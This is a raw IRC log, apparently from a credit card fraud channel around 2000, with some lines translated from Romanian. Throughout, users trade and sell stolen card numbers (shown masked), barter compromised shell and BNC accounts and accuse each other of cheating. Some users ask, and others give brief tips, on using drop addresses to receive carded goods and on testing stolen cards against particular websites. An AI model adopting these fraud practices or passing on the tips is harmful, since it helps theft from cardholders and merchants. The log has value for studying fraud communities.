will trade :Ricky! :i dont go first :m4r1n4ru! :Away :m4r1n4ru! :Away :m4r1n4ru! :Away :ABA! :Anyone want to trade cards? :ABA! :Anyone want to trade cards? :m4r1n4ru! :Away :ABA! :Anyone want to trade cards? (msg me now) :AlfonsoD! :im trading too :ABA! :msg me AlfonsoD :AlfonsoD! :anyone trading? :m4r1n4ru! :Away :m4r1n4ru! :Away :m4r1n4ru! :Away :m4r1n4ru! :Away :m4r1n4ru! :Away :ABA! :Anyone trading cards? :ABA! :4No one trade with D4r1u55 :ABA! :4Hes a ripper :ABA! :4No one trade with D4r1u55 :ABA! :4Hes a ripper :[4g3nt]! :yo :[4g3nt]! :is a master card a 16 digit or 13 ? :ABA! :16 :D4r1u55! :? :ABA! :xxxx/xxxx/xxxx/xxxx :ABA! :4No one trade with D4r1u55 :ABA! :4Hes a ripper :D4r1u55! :wow :D4r1u55! :ABA :D4r1u55! :look here :D4r1u55! :[10:24] Not Approved: Customer information invalid. :D4r1u55! :[10:24] Not Approved: Invalid Credit Card Number. :D4r1u55! :u give me 2 cc's.but are not viabils :D4r1u55! :[10:11] Dick xxxxxxx :D4r1u55! :[10:11] xxx St Example St :D4r1u55! :[10:11] Somewhere US :ABA! :I gave you two working CCs :ABA! :then :ABA! :you try to send me :ABA! :some bullshit :D4r1u55! :10:11] 10320 :D4r1u55! :[10:11] 06/200x :D4r1u55! :[10:11] Mastercard. :D4r1u55! :[10:11] xxxx xxxx xxxx xxxx :D4r1u55! :[10:11] . :ABA! :1.2meg html file :D4r1u55! :[10:11] John Salvo :ABA! :fucking thief :ABA! :4No one trade with D4r1u55 :ABA! :4Hes a ripper :D4r1u55! :[10:11] 1175 Example Ave :D4r1u55! :[10:11] 33146 :D4r1u55! :[10:11] VISA :D4r1u55! :10:11] VISA :D4r1u55! :[10:11] 12/200x :D4r1u55! :[10:11] xxxxxxxxxxxxxxxx :D4r1u55! :and that's all :ABA! :you lame gimp :ABA! :youve got them the wrong way round :ABA! :thief :ABA! :4No one trade with D4r1u55 :ABA! :4Hes a ripper :m4r1n4ru! :Away :D4r1u55! :that two cc's u send to me :D4r1u55! :and are'nt good :D4r1u55! :dont work :D4r1u55! :try to understand :D4r1u55! :whatever :[4g3nt]! :how can i card a company cc? :ABA! :4No one trade with D4r1u55 :ABA! :4Hes a ripper :[4g3nt]! :hihi :[4g3nt]! :anyone can tell me how to use a company owned cc?? :m4r1n4ru! :Away :Emy__! :I need some Cc `z (Visa) :Emy__! :... :ABA! :Anyone want to trade cards, msg me. :Emy__! :I need some credit cards .... Visa :ABA! :Emy MSG me then :m4r1n4ru! :Away :D4r1u55! :ACTION plek pa :J4n3! :nettlink :ABA! :ANYONE want to trade cards? :Emy__! :I need some credit cards .... Visa :ABA! :Message me then you fucking idiot :ABA! :how many more times :m4r1n4ru! :Away :2red! :ACTION is selling virgin credit cards, /msg me for deal. :ABA! :4ANYONE want to trade cards? Msg me :ABA! :4ANYONE want to trade cards? Msg me :[4g3nt]! :fuck ABA <<< ripper :[4g3nt]! :fuck ABA <<< ripper :[4g3nt]! :fuck ABA <<< ripper :Emy__! :I need some credit cards .... Visa :m4r1n4ru! :Away :ABA! :4ANYONE want to trade cards? Msg me :ABA! :4ANYONE want to trade cards? Msg me :m4r1n4ru! :Away :Emy__! :anybody want to give me a cc ?? :m4r1n4ru! :Away :m4r1n4ru! :Away :m4r1n4ru! :Away :ABA! :Anyone want to trade cards? :sunfire! : :ABA! :Anyone want to trade cards? :m4r1n4ru! :Away :m4r1n4ru! :Away :connex! :anyone can help me to buy a shell? :m4r1n4ru! :Away :m4r1n4ru! :I have Returned. :m4r1n4ru! :-op :sunfire! : :-) :|DONNIE|! :ne1 have BNC...i have virgin.. :|DONNIE|! :lets trade :DuXO! :hi to all :Razzorz! :anyone have bnc :Razzorz! :anyone have bnc? :Razzorz! :please tell me about bnc :DuKso! :hi anyone alive? :2red! :nope :DuKso! :how are u 2red :) :DuKso! :where are u from? :2red! :<- mortie/lita :DuKso! :hi man :DuKso! ::) :DuKso! :what are u doing:) :2red! :nothing :2red! :just listening to music :Nic[EQ]! :ACTION is trading Visas and MCs, looking for more or for shells :Emy__! :I need some cc `s (I do not have any ) :FooDSt4mP! :anybody have any visa's? i need to get a plane tick for a chick who's being abused by her husband :FooDSt4mP! :ill trade shells and dialup accounts for a visa/cc :[St0rM]! :hahahah :FooDSt4mP! :dude its not funny :FooDSt4mP! :its sad :FooDSt4mP! :i know it sounds like good bs for a card but its not.. :MonTs! :what sort of shells? :FooDSt4mP! :aragorn.example.net :FooDSt4mP! :its a linux box.. rh 6.1... 6 bg's... 250 meg quota... :MonTs! :how many BG process? :FooDSt4mP! :redundant t3 conn :FooDSt4mP! :6 bg's :MonTs! :what's the http address? :FooDSt4mP! :no http.. its a private shell off a friends companies box :FooDSt4mP! :example.net is the isp :FooDSt4mP! :aragorn.example.net is the telnet addy :FooDSt4mP! :i just need some cc to get a damn ticket for this girl man :FooDSt4mP! :msg me if you wanna trade :pFFt--! :ACTION any1 wanna trade virgin cc's? msg me for fair trade (rippers go away) :pFFt--! :ACTION any1 wanna trade virgin cc's? msg me for fair trade (rippers go away) :2red! :pFFt-- :Neon! :Have some cc... :pFFt--! :ACTION any1 wanna trade cc's? msg me for fair trade (rippers go away) :pFFt--! :ACTION any1 wanna trade cc's? msg me for fair trade (rippers go away) :2red! :we hear you :2red! :stop it :pFFt--! :ACTION any1 wanna trade cc's? msg me for fair trade (rippers go away) :pFFt--! :ACTION any1 wanna trade cc's? msg me for fair trade (rippers go away) :pFFt--! :ACTION any1 wanna trade cc's? msg me for fair trade (rippers go away) :pFFt--! :ACTION any1 wanna trade cc's? msg me for fair trade (rippers go away) :kurky! :I need someone to do me a favour.... :kurky! :ull get a few virgin visa's :m4r1n4ru! :-join #rocarding :m4r1n4ru! :-save :glipy! :bah @ hi! :glipy! :care-mi zice shi mie un site de un sa cumpar tembelfoane @ tell me a site where to buy "idiot-phones" (probably mobile phones) :glipy! :hap :glipy! :? :^W! :ACTION is trading ccz msg me for trade :wizz! :hey tabacu :TanTouze! :ok I'm here, now what were you saying? :NiCeBoY! :ello :NiCeBoY! :wers coolworx? :Mendoza! :hey . Ibill is cardable? :DuXo! :hi to all :DuXo! :how are we today :NiCeBoY! :ello duxo :ABA! :Anyone want to trade cards? MSG me :DuXo! :npn msg me :ABA! :Anyone want to trade cards? MSG me :NiCeBoY! : :DuXo! :any trade cc :ABA! :Anyone want to trade? :DuXo! :me :) :ABA! :heh :ABA! :again? :DuXo! ::)) :DuXo! :yes but do u have with the phone number too? :lkd1! :i have :ABA! :no, just make one up innit :P :DuXo! :lkd1 :) :DuXo! :ripper:) :DuXo! :he just leave the channel :)) :ABA! :ripper? :DuXo! ::) :ABA! :I just traded wif him :P :DuXo! :aND? :DuXo! ::) :DuXo! :he gaved u valid? :DuXo! :i haven`t trade.. :ABA! :I verified :DuXo! :but he don`t wanted to trade with me ..... :ABA! :before I gave him # :DuXo! :becasue he thinked... :DuXo! :im ripper :2red! :duxo :P :DuXo! :with +v :ABA! :heh :ABA! :ive been ripped so many bloody times :ABA! :if they dont give me first :ABA! :I dont trade ever :DuXo! :ok.... :ABA! :cos ive been ripped so many times :ABA! :about 10 times wif cards :ABA! :3 shells :ABA! :etc :2red! :tss :2red! :is that supposed to be something? :2red! :i got ripped off 40 virgins in one deal once :ABA! :40 virgins what? :2red! :40 virgin cards :ABA! :Drake``: Trade? :ABA! :ic :ABA! :and when some little foreign pissant lamer :ABA! :steals from you :Drake``! :trade what? :ABA! :then runs off :ABA! :Drake``: Cards :ABA! :it makes you wanna bloody cry :ABA! :and beat your comp :ABA! :innit :2red! :where are you from npn, romania? :ABA! :no uk :2red! :ok :2red! :sweden here :ABA! :england :2red! :interested in UK virgins? :ABA! :leet :ABA! :hmmm :ABA! :yup :2red! :i got plenty of international virgins :2red! :and US ofcourse :ABA! :quick tho :ABA! :cos i gtg real soon :2red! :err? :2red! :quick though what :ABA! :trade quick :ABA! :get on wif it :ABA! :cos i gtg :2red! :why would i trade virgins? :ABA! :no :ABA! :like i gib you summat else :2red! :hehe :2red! :i sell cards dear. :ABA! :oh dear :ABA! :so :ABA! :what do you want for it :2red! :money :ABA! :how much? :2red! :depends on how many you want :ABA! :10 :2red! :100 dollars :ABA! :fuck me :2red! :? :ABA! :(please) :ABA! :i aint got 100$s :2red! :thats what it costs :2red! :thats how it is :) :hhkrgb! :romania anyone? :Bl4ck_! :yes :ABA! :0mg :ABA! :I dont fucking believe this :ABA! :that fool :ABA! :DuXo just ripped my card :ABA! :and ran :2red! :you surprised or something? :ABA! :erm :ABA! :yes :ABA! :hes an op :2red! :so? :ABA! :and ops dont do that kind of shit :ABA! :ive been trading here :ABA! :for about :ABA! :6 months :ABA! :and no ops ever done that shit :2red! :thats interesting :2red! :cause i havent seen you areound much before :ABA! :Ive never seen you either :m4r1n4ru! :ABA can you send me a log man ? :2red! :my usual nick is mortie or lita :ABA! :m4r1n4ru yea, when I get back :ABA! :2red: ive seen the nick lita :ABA! :ages ago :m4r1n4ru! :ok send me log please :ABA! :I need dinner :t4b4cu! :huh :2red! :duxo :Piano2! :what? :t4b4cu! :so taht's lita :DuXo! :it`s me.. :Bl4ck_! :t4b4cu? :2red! :im lita yeah :t4b4cu! :always changing nicks :t4b4cu! :hhe :DuXo! :i know.. :Bl4ck_! ::>> :2red! :doesnt matter since i dont trade :2red! :i just watch you ppl :DuXo! :hm :2red! :and obviously an op just ripped? :DuXo! :npn :DuXo! :man :DuXo! :m4r1n4ru :DuXo! :i haven`t rip him up :2red! :what happened then? :DuXo! :man :DuXo! :he gaved me CCs :m4r1n4ru! :ya :m4r1n4ru! :what ? :DuXo! :2 :DuXo! :and the both where invalid :DuXo! :we tradeed 340 minutes before :t4b4cu! :? :DuXo! :we tradeed 30 minutes before :DuXo! :he gaved me valid :t4b4cu! :who ripped? :DuXo! :and i gaved him valid CC :DuXo! :man :DuXo! :becuase i haved +v :t4b4cu! :who ripped? :t4b4cu! :i ban anyone who ripps :t4b4cu! :so ....i'd like to know :DuXo! :i checked the 2 ccs on www.come.to/tdnga :DuXo! :the first 2 sex banners.. :DuXo! :i used the first one :DuXo! :and the CC comed out decliened :DuXo! :after that :DuXo! :i checked the CC on www.bonzi.com :DuXo! :on Internet Boost :DuXo! :the first one come out and send me Invalid Card... :DuXo! :and another that the card is not valid anymore... :DuXo! :tabacu are u here?? :2red! :oh well :2red! :you kids :2red! :i never understood the point of trading cards anyway :t4b4cu! :ahhahaah :t4b4cu! :looolz :t4b4cu! :us kids? :DuXo! :LoL :t4b4cu! :how old are u my dear? :2red! :im 20 :2red! :why :DuXo! :so :t4b4cu! :lolz :DuXo! :what will happen? :t4b4cu! :i'm 20 too :DuXo! :u know that im a Legit one :DuXo! :i can prove that man.. :DuXo! :i have never ripped a man :t4b4cu! :most ppl areound here are about that age :2red! :i dont see anyone in here as legit :t4b4cu! :ahhah :t4b4cu! :what about me? :2red! :why would i see you as legit? :t4b4cu! :i have more ccs than anyone here :t4b4cu! :heh :2red! :and how many is that? :t4b4cu! :and i never ripped in my life :t4b4cu! :about 40.000 :2red! :is it just me or could anyone say that? :t4b4cu! :anyway....i more hacker than carder :2red! :same here :t4b4cu! :that's why i could take this chan over :t4b4cu! :eheh :t4b4cu! :with my friends :hhkrgb! :join/romania :2red! :taking over a channel doesnt really require any skills. :hhkrgb! :wops :t4b4cu! :we flooded from oc48 :t4b4cu! :heh :t4b4cu! :lolz :t4b4cu! :it does :2red! :packeting is for kids :t4b4cu! ::) :DuXo! :tabacu :DuXo! :is everthing ok now? :t4b4cu! :yeh it is :DuXo! :ok.. :m4r1n4ru! :hhm :DuXo! :what? :m4r1n4ru! :so he ripped or not ? :DuXo! :no man.. :DuXo! :i telled u i checked the cc :DuXo! :where is he :DuXo! :i will talk with him :DuXo! :and check the CCs again :DuXo! :and give to the channel :m4r1n4ru! :ok :DuXo! :i don`t have the logs.... :DuXo! :to prove right now.. :hhkrgb :co^digigi! :hekss :co^digigi! :heks... :co^digigi! :i have a shell...and wanna trade with calling card :co^digigi! :serious person msg me :DuXo! :cool :Co0lWoRx! :yo :DuXo! :let`s got to work :DuXo! :gety :DuXo! :get :DuXo! :and try that . :Co0lWoRx! :damn it :DuXo! :what the fuck is this :) :seriuscar! :what did you have in mind about tradi :seriuscar! :have bnc, proxies and shell....msg me if want to trade :seriuscar! :have bnc, proxies and shell....msg me if want to trade :Drake``! :co^digigi left after ripping me :Drake``! :hehehe :Co0lWoRx! :yo drake :seriuscar! :have bnc, proxies and shell....msg me if want to trade :seriuscar! :have bnc, proxies and shell....msg me if want to trade :seriuscar! :have bnc, proxies and shell....msg me if want to trade :MRuiCosta! :ACTION will trade virgin mc and visa for a shell acct that lets me dns host a .net site :taur! :salut @hello :taur! :astia tac si fac @this people are doing it silently (this is "they are efficient") :ows :ows :ows :MonTs! :howdy folks? :xKurko! :Can anyone do me a favour... Msg me.... Virgin CC in it for ya :xKurko! :Can anyone do me a favour... Msg me.... Virgin CC in it for ya :iDoetS! :gollllllllllllll :iDoetS! :1 more :MonTs! :1 more for whom? :iDoetS! :ceko :m4r1n4ru! :-join #rocarding :m4r1n4ru! :-save :xKurko! :can anyone gimme one fast proxy??? :m4r1n4ru! :-op :|AmDeAtH! :-op :|AmDeAtH! :lol hehe :Reaggyman! :Do sombody now what the program ares do? :Reaggyman! :whats ares? :trinix! :sup all? :Reaggyman! :trinix: do you now what ares is :trinix! :any one got any tips for ordering stuff to yer own house with out getting caugfht? :trinix! :caught? :trinix! :no :trinix! :sultrix says u guys are the ones to ask :Reaggyman! :Do you now a program that cracks sex(enter)password? :trinix! :nope :Reaggyman! :are you new here? :trinix! :yeah :Reaggyman! :me to :Reaggyman! :nowbody answers :trinix! :I am from uk :Reaggyman! :Norway :trinix! :I need help on how to order to my house with out getting caught :trinix! :using cc :Reaggyman! :What? :Reaggyman! :Order What? :trinix! :I wanna order stuff yeah but want to order straight to my house in the uk :Reaggyman! :isent that easy? :trinix! :hmm not sure :trinix! :I wanna an abandoned house but can't find any :Reaggyman! :I dont now :Reaggyman! :i came here to :Reaggyman! :i need a cracking program :trinix! :why dun you just go to www.xxxpassowrds.com :glipy! :what cracking program :Reaggyman! :i dont think they got THAT kind of passwords :Reaggyman! :The name is Ares :Reaggyman! :Hi sultrix :trinix! :heya man :Reaggyman! :i was band for xxxpasswords :Sultrix! :Hello :Sultrix! ::-( :Reaggyman! :Can you help me sultriz :Reaggyman! :x :Sultrix! :Can you guys help me i had a few working CC's but the dun work no more cxan anyone throw me few WORKING cc's my way please ? :Sultrix! :Reaggyman: Sure whatsup ? :Reaggyman! :Do you now a program that cracks sex(enter)password? :MonTs! :Reaggyman ....try going to http://www.catfiles.net/adult.htm :Sultrix! :hmm :Sultrix! :no idea :Reaggyman! :Monts: whats that? :MonTs! :go there and have a look :Reaggyman! :and this is :Reaggyman! :password? :Reaggyman! :Hi tauer :Tauer! :hi :Reaggyman! :can you help me? :Reaggyman! :Do you now a program that cracks sex(enter)password? :astavista! :lol :trinix! :shit can anyone slide me some tips? :tauer! :mai @ man :tauer! :asa ceva mai greu @ this is a little bit harder :trinix! :shit can anyone slide me some tips? :Reaggyman! :tauer what+ :tauer! :dar poti s-a te duci la un site care da passworduri pt siteuri de genu asta @ but you can go to a site who gives passwords for sites like that :trinix! :wtf :tauer! :sau potzi s-a te inregistrezi cu un card @ or you can register yourself with a card :Reaggyman! :English plis :tauer! :lol :tauer! :u can go to a site thwt give u password :tauer! :sheet :tauer! :sorry :trinix! :wtf :tauer! :anibody spek romanian? :trinix! :shit can anyone give me some tips? :tauer! :what kind of tips? :tauer! :trinix? :Sultrix! :in credit card fraud he means :tauer! :lol :tauer! :what i am thinking....:) :Sultrix! :heh :tauer! :the chanel carding :trinix! :I wanna send some stuff to my house in the uk, any tips on how to not get caught? :tauer! :is hard to someone to teel u about theat :tauer! :in uk? :tauer! :is verry hard :trinix! :what? :tauer! :but u can sendit to me in other country :trinix! :is hard to someone to teel u about theat <------------ what? :tauer! :and i can sendit to u :trinix! :nah :tauer! :about:I wanna send some stuff to my house in the uk, any tips on how to not get caught? :xKurko! :I offered that and Im in the UK with a different drop than my house :trinix! :I have cc of people in USA and wanna buy stuff in the UK and send it to me in my house :tauer! :i dont write to well in enghlish :trinix! :any tips? :tauer! :u can sendit to me in romania and i sendit to u after the pocket arieve to me :tauer! ::) :trinix! :nah take to long :tauer! :lol :tauer! :is my turn? :trinix! :besides you might keep it :tauer! :to ping time out? :tauer! :food weaponds? :tauer! :flood :trinix! :wb bro :Sultrix! :ta :Sultrix! :wassup bra :trinix! :nadda :trinix! :reading up on some shit :Sultrix! :cool :Sultrix! :Has anyone here got any WORKING CC numbers ? :tauer! :i sell vodoo 3 3000 100$ :tauer! :whith id :tauer! ::) :damang! :need some fresh cc :Sultrix! :me too :YesIAm! :haha :trinix! :me too :Sultrix! :Anyone got any cc numbers that work :trinix! :answer him god damn it :YesIAm! :my cc number works :fus10nx! :nope... :YesIAm! ::) :CC-Master! :who trade here? :fus10nx! :not U :fus10nx! :Not I :trinix! :fus10nx yeah.... :CC-Master! :? :CC-Master! :so :CC-Master! :anyone for trade round here? :damang! :shells for fresh cc :CC-Master! :what shels or ccz? :damang! :i have shelz :Sultrix! :Does anyone have any CC's ?? :CC-Master! :ye :CC-Master! :i have :CC-Master! :so? :Sultrix! :that i can have :YesIAm! :hahaahaha :Sultrix! :ffs :damang! :need some fresh cc :Sultrix! :Can nayone dish some ccs my wya pease :YesIAm! :If somebody wanted to donate a # he would paste it into the chan :damang! :i have shelz wana trade w/ cc :BONI! :hi anyone for trade? :YesIAm! : anyone for trade round here? :BONI! :? :BONI! :so>? :rgers! :hi boni :rgers! :how are u? :rgers! ::)) :Nic[AwaY]! :ACTION have a lot of ccs ( Mastercards and Visas ) trading for more or eggdroppable shells :Papa-tudo! :anyone trade bncs with vhosts? :Papa-tudo! :ACTION trading bncs with vhosts :Papa-tudo! :ACTION trading bncs with vhosts :Papa-tudo! :ACTION trading bncs with vhosts :ureche! :re :_Mephisto! :re :_Mephisto! :cine pizda masii a pus topicul ala idiot? @ who the fuck set that stupid topic? :SIZIF! :enybody have cc? :Bl4ck_! :t4b4cu :ucok! :hai :Bl4ck_! :salut @ hello :ucok! : :ucok! :xeexxexeexxeeeexe :t4b4cu! :salut @ hello :dlotos33! :is there anyone from MACEDONIA? :SIZIF! :yep :blazo99! :what's the problem duds :FanTom! :some one wots to trade :GoDsHaNd! :can someone help me? :blazo99! :what's the problem :GoDsHaNd! :blazo99 :GoDsHaNd! :ej :GoDsHaNd :Pinu\away! :hi :t4b4cu! :c :Clasher! :Sorry to bother, but, does anyone have a spare card? :Co0lWoRx! : :Bl4ck_! :m4r1n4ru :Bl4ck_! :m4r1n4ru :Bl4ck_! :m4r1n4ru :m4r1n4ru! :marca ma @ (???) :Co0lWoRx! :7me any1 here wanna earn +v, msg me now :Co0lWoRx! :ACTION any1 here wanna earn +v, msg me now :Co0lWoRx! :ACTION any1 here wanna earn +v, msg me now :Bl4ck_! :de ce am ban pe #rocarding? @ why am I banned on #rocarding? :Bl4ck_! :Co0lWoRx :PP :m4r1n4ru! :? :Co0lWoRx! :? :Co0lWoRx! :? :Co0lWoRx! :??? :Bl4ck_! :Co0lWoRx I used to have +v in here :Bl4ck_! ::>> :Co0lWoRx! :well, y u loose it? :Bl4ck_! :dunno :Bl4ck_! :never minds :Bl4ck_! ::>> :SIZIF! :enybody have cc? :Co0lWoRx! :look at this shit ppl :Co0lWoRx! : do u have cc's? :Co0lWoRx! : hmmm, yes, a lot :Co0lWoRx! : would u like to send me just one? :Co0lWoRx! : hahahaha, go away pls lamer :SIZIF! :enybody have cc? :Co0lWoRx! :ure banned man, bye :SIZIF! :IZIF> succker > :DuXo! :come on :DuXo! :go shake ur dicks:))))) :Co0lWoRx! :lol :_Mephisto! ::P :DuXo! :put ur dick in the Cd-rom :)) because u can`t put it in pussy :)))))) :yourlife! :? :DuXo! :what ??? :yourlife! ::) :m4r1n4ru! :-join #rocarding :m4r1n4ru! :-save :TanTouze! :I was sexually assaulted by Bill Clinton :DuXo! :anyone here wants to be my drop? :Sp07! :sup :Sp07! :im done with high school :Sp07! :ahahhhhhhhhhhhhhhhhhhhhhhhhhahahaa :Sp07! : :Sp07! :@#$ :Sp07! : :Sp07! : :DuXo! :bye to all :_Mephisto! :bya :_Mephisto! :bye :Tzaranul! :aaa :Tzaranul! :re :Tzaranul! ::) :SPANkY_! :anyone here trade msg me :SPANkY_! :anyone here trade msg me :Nightw|sH! :re Bl4ck :SPANkY_! :anyone here trade msg me :trinix! :sup all? :trinix! :any one want to send some ccs over my way? :trinix! :any one want to send some ccs over my way? :SPANkY_! :anyone here trade msg me :D1ck! :ins :D1ck! :J4n3 :SPANkY_! :anyone here trade msg me :SPANkY_! :anyone here trade msg me :SPANkY_! :anyone here trade msg me :dmonchild! :ACTION i am selling hardware if your intrested please /msg me for prices :Cyb3rL0rd! :re ppl :Sultrix! :Does anyone have any WORKING credit cards the will let me have one to use ? :hackmon! :bye :Sultrix! :Does anyone have any WORKING credit cards the will let me have one to use ? :Fr0d! :any1 op/voice wanna trade :m4r1n4ru! :-op :Co0lWoRx! :hello :Fr0d`! :hey :Fr0d`! :sup manm :Bl4ck_! :Chel00 heya :m4r1n4ru! :ajajajajaj :Co0lWoRx! :lol :Co0lWoRx! :hey negro, do u ever wonder why Chel00 never talks? :Bl4ck_! :coz is an emech :Bl4ck_! :Chel00 say hi Co0lWoRx :Bl4ck_! ::> :Chel00! :hi Co0lWoRx :Bl4ck_! ::PP :Co0lWoRx! :lol :Co0lWoRx! :ok :_KAoS_! :anyone in that wants to trade? :Fr0d! :msg me :Co0lWoRx! :bbl :TanTouze! :sell me something.... anything. QUICK :Bl4ck_! :ACTION is away -[ bbl ]- at 04:48a -[ P:On / L:On ]- :Bl4ck_! :ACTION is back -[ bbl ]- gone 1 min 49 s :m4r1n4ru! :-op :m4r1n4ru! :-op :connex! :i need a cc to buy a shell...anybody can help me? :[Mighty]! :trade CC ? :Fr0d! :msg me :connex! :yes or visa(master) :Tzaranul! :re :Tzaranul! ::) :connex! :i need a cc to buy a shell...anybody can help me? :connex! :i need a cc to buy a shell...anybody can help me? :_Mephisto! :where do you buy the shell??? :Bl4ck_! :www.turbulent.net :Bl4ck_! :www.turboshell.com :Bl4ck_! :www.shellyeah.org :Bl4ck_! :www.bestshell.com :_Mephisto! :thx :Bl4ck_! ::> :[sm0ke]! :is turbulent.net cardable? :m4r1n4ru! :nope :m4r1n4ru! :ajajajaaja :[sm0ke]! :hehe. i knew it. . :[sm0ke]! :u have to mail da freakin receipt. .. to have it activated. . :connex! :i need a cc to buy a shell...anybody can help me? :connex! :pls help me :_Mephisto! :bye :connex! :i need a cc to buy a shell...anybody can help me? :connex! :pls help me :[sm0ke]! :buy a shell? where? :connex! :[sm0ke] help me :connex! :[sm0ke] help me i want to buy a shell :TheRason! :hello anybody :TheRason! :i need a cc to buy a web domain :[sm0ke]! : :card-it! :trading lists, /msg me.... :card-it! :trading lists and merchants, /msg me.... :card-it! :no traders in here? :Bl4ck_! :ACTION is away -[ Starcraft si astea si alea ]- at 06:26a -[ P:On / L:On ]- :card-it! :trading lists and merchants, /msg me.... :card-it! :trading lists and merchants, /msg me.... :card-it! :trading lists and merchants, /msg me.... :card-it! :trading lists and merchants, /msg me.... :card-it! :trading lists and merchants, /msg me.... :|Makaveli! :how can we get the +v??? :|Makaveli! :or an op :gatorade^! :ACTION is trading ccz msg me :J4n3! :D1ck ? :D1ck! :yep :D1ck! :y0 :D1ck! :i am from my dad's laptiop :D1ck! :sun :D1ck! :i need a webpage :D1ck! :for the box :J4n3! :webpage ? :D1ck! :deal finialised :D1ck! :and u know how can i accept credit card online? :J4n3! :yeah u can but fruad bauth hoga, but :D1ck! :? :J4n3! :if u set the rule that fax or email the scanned copy of credit card phir sahi hai :D1ck! :we have to pay for fraud or its their responsibility/ :D1ck! :oh :D1ck! :kool :J4n3! :yeah :) :D1ck! ::) :D1ck! :can u start the page :D1ck! :? :J4n3! :server ka kyia huwa ? :J4n3! :webpage ban jayega forun, j0e kay site ka matter hai meray pass, just need the prices :J4n3! :what's the compnay name ? i mean site name ? :J4n3! :? :D1ck! :got d/c :J4n3! :wb :J4n3! :webpage ban jayega forun, j0e kay site ka matter hai meray pass, just need the prices :D1ck! :thx :J4n3! :what's the compnay name ? i mean site name ? :D1ck! :company's name is 'Big Stuff' :D1ck! :or u have any beter name? :D1ck! :i want a site some thing like www.unixrules.net :D1ck! :i`ll tell u the prices :J4n3! :hmm :J4n3! :unixrules is booked i think :D1ck! :no no :D1ck! :i am ssaying :D1ck! :look at their page :D1ck! :it rox :J4n3! :oh u mean designing ? :D1ck! :yeps :D1ck! :hehe :D1ck! :'Big Stuff' :D1ck! :The Ultimate Web Solution. :J4n3! :hmm :D1ck! :till when will be the website complete? :J4n3! :wait lemme take a look :D1ck! :oki :J4n3! :hmm yeah saw it :D1ck! :kewl :D1ck! :what prices should we do? :J4n3! :no idea i think it should start from 9 to 10 $ for shell :J4n3! :3 to 4 for bnc :D1ck! :oki :J4n3! :webhosting i'll ask j0e :D1ck! :okies :J4n3! :oye what bout server ?? :D1ck! : 4 background processes (eggdrop, screen, irc) :J4n3! :got this box its fast 24.66.83.137.mb.wave.home.com :D1ck! : 2 login names :D1ck! : 20 MB total disk space :D1ck! : FTP, and SSH access :D1ck! : 2 POP3 Email addresses (username@celebreum.net) :D1ck! : Access to hundreds of VHOSTS :D1ck! : 3 months [$30] - 6 months [$60] - 12 months [$120] :D1ck! : Credit Card Customers, Sign up here :D1ck! : Sign up Now :J4n3! :but no linux root kit :( :D1ck! :server? :D1ck! :heheh :J4n3! :i mean have u finalized? :D1ck! :my computer is not working :D1ck! :thats why i am in this :D1ck! :yep :J4n3! :oh :D1ck! :finisalised :J4n3! :going to pay for it ? :D1ck! :yep :J4n3! :anuallay ?? how much ? :D1ck! :welp :D1ck! :200/month :D1ck! :and rent is 25 :D1ck! :225 :J4n3! :oh kewl :J4n3! :ip's ? :J4n3! :how much ip's ? :D1ck! :256 :D1ck! ::") :J4n3! :great :) :D1ck! :hehe :D1ck! :wait i`ll send u .txt for shells :D1ck! :one sec :J4n3! :k :J4n3! ::) :D1ck! ::) :J4n3! :Caldera OpenLinux(TM) :J4n3! :Version 2.2 :J4n3! :Copyright 1996-1999 Caldera Systems, Inc. :D1ck! :oye accept this :J4n3! :send send :J4n3! :bin/login: error in loading shared libraries: libcrypt.so.1: cannot open shared object file: No such file or directory :D1ck! :make it attractive and stuff :J4n3! : DCC Unable to create connection: Connection refused :D1ck! :err :D1ck! :copy paste this :D1ck! :SPECIAL PACKAGE :D1ck! : :D1ck! : 4 background processes (eggdrop, screen, irc, energymechs) :D1ck! : 25 MB total disk space :D1ck! : FTP, and SSH access :D1ck! : 2 POP3 Email addresses (username@celebreum.net) :D1ck! : Access to hundreds of VHOSTS :D1ck! : :D1ck! : 1 month [$20] 3 months [$40] - 6 months [$60] - 12 months [$120] :D1ck! :SILVER SHELL ACCOUNT :D1ck! : 2 background processes (eggdrop, screen, irc, energymechs) :D1ck! : 10MB total disk space :D1ck! : FTP, and SSH access :D1ck! : POP3 Email addresses (username@celebreum.net) :D1ck! : Access to hundreds of VHOSTS :D1ck! : 1 month [$10] 3 months [$30] - 6 months [$55] - 12 months [$100] :D1ck! : :D1ck! :GOLD SHELL :D1ck! : 4 background processes (eggdrop, screen, irc, energymechs) :D1ck! : 2 login names :D1ck! : FREE Personal vhost (username@can.choose.from.many.domains) :D1ck! : 100 MB total disk space :D1ck! : FTP and SSH access :D1ck! : 2 POP3 Email addresses (username@celebreum.net) :D1ck! : Access to hundreds of VHOSTS :D1ck! : 3 months [$60] - 6 months [$110] - 12 months [$200] :D1ck! :make the rupeese too pls :D1ck! ::P :J4n3! :hah u forgot to write the BitchX ? :D1ck! :oh yes :D1ck! :irc==BitchX :J4n3! :eggdrop, screen, irc, energymechs, BitchX :D1ck! :yep yep :D1ck! :add it :D1ck! ::P :J4n3! :ok :J4n3! :kkz wait lemme copy it :D1ck! :oye thats stolen from unixrules :D1ck! :so change it a bit :D1ck! :jhehe :D1ck! :hehe :J4n3! :ok done :) :J4n3! :yeah don worry prices r same ? :J4n3! :or u modified it ? :D1ck! :modified :D1ck! :and mb space too :J4n3! :kkz :J4n3! :Celebrium ? :D1ck! :yep :D1ck! :ok now webpage :D1ck! :BASIC WEBHOSTING :D1ck! : 100MB disk space :D1ck! : 1 Mailbox (POP3/SMTP) :D1ck! : $0.50 per MB on any average storage beyond the standard allowed disk space :D1ck! : 500 MB of data transfer per month :D1ck! : 3 months [$30] - 6 months [$55] - 12 months [$100] :D1ck! :PRIME WEBHOSTING :D1ck! : 200 MB disk space :D1ck! : 5 Mailboxes (POP3/SMTP) :D1ck! : FREE Domain Name Registration (internic fee applies) :D1ck! : Unlimited email address forwarding :D1ck! : Custom CGI script directory :D1ck! : $0.50 per MB on any average storage beyond the standard allowed disk space :D1ck! : 1500 MB of data transfer per month :D1ck! : 3 months [$60] - 6 months [$110] - 12 months [$200] :D1ck! :PRO WEBHOSTING :D1ck! : 350 MB disk space :D1ck! : 25 Mailboxes (POP3/SMTP) :D1ck! : Unlimited email address forwarding :D1ck! : Custom CGI script directory :D1ck! : PHP3 access :D1ck! : Frontpage Extension access :D1ck! : $0.50 per MB on any average storage beyond the standard allowed disk space :D1ck! : 5000 MB of data transfer per month :D1ck! : 3 months [$150] - 6 months [$275] - 12 months [$500] :D1ck! :modify style and idhar udhar so it doesnt look as we stole it :D1ck! :hehe :J4n3! 